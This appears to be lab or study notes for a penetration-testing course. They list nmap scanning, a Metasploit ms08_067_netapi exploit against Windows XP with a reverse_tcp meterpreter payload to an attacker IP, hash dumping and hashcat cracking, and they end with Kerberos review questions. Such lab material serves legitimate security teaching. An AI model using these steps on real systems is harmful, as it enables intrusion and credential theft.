1 - Discover hosts (IP Addresses) on a network
nmap -sP 192.168.1.0/24
2 - Determine Operating Systems of the hosts
nmap –O –v <ip address>
3 - Use metasploit framework to gain access to another OS
Launch msfconsole
sessions -l, sessions -i
search windows/smb
search netapi
1 - WinXP
Decide on exploit:
use exploit/windows/smb/ms08_067_netapi
Decide on payload:
windows/vncinject/reverse_tcp
or
set payload windows/meterpreter/reverse_tcp
Settings:
show options
set rhost - <target ip>
set lhost - <attacker ip>
viewOnly? false
Run exploit:
exploit
hashdump
download
4 - Locate password hashes & crack using brute force
./hashcat-cli64.app <hash file> <password file>
5 - Explain Kerberos Ticket Exchanges.
- How does TGS know...
- Name the key that is used to...
- what keys use authenticators?